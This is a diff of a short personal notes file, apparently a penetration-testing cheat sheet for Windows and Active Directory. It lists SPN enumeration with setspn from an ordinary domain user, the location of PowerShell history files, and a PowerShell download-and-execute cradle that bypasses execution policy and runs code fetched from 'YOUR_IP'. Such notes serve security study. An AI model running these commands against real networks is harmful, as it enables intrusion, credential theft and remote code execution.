hson2654/attarki/win.md

   gpupdate /force      #update the gp group policy. \n net share sharename=c:\foldername          # share a folder setspn HTTP/nameofhost(sql.inmy.com) inmy\sqladmin
+>powershell history
+>  Powershell saves all previous commands into a file called ConsoleHost_history.
+This is located at %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
 >setspn -T medin -Q ​ */*  //to extract all accouint in SPN, when we have a normal user in a hsot in AD

->
-  //pwershell to downlaod file
+>//pwershell to downlaod file
       powershell -ep bypass;
       iex​(New-Object Net.WebClient).DownloadString('https://YOUR_IP/xx')
       or curl http://xxx/xx -o xx